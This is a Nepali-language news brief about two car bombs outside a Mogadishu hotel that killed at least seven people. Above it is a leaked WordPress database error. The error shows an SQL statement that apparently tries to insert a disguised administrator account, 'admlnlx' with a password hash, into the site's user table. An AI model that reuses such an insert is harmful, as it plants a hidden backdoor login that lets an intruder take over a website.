WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BrP317uZwWc0K/SJFkHNHRXokVQ47H.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 16:04:45', '', 'admlnlx', 'admlnlx')
मोगादिसु,माघ १२ –
मोगादिसुको एक चर्चित होटल अगाडि दुईवटा कार बम विस्फोट हुँदा बुधबार कम्तीमा सातजनाको मृत्यु भएको छ ।
मृत्यु हुनेमा आमनागरिक र केही होटलका सुरक्षाकर्मीहरु रहेका प्रहरी अधिकारीहरुले जानकारी दिएका छन् । दुईवटै विस्फोटनका घटनामा परी अरु कैयौँ घाइते भएका छन् ।
स्थानीय प्रहरी अधिकृत इब्राहिम मोहम्मदले विस्फोटनमा परी दुईजना बन्दुकधारीको पनि मृत्यु भएको जानकारी दिनुभयो । – रासस÷एएफपी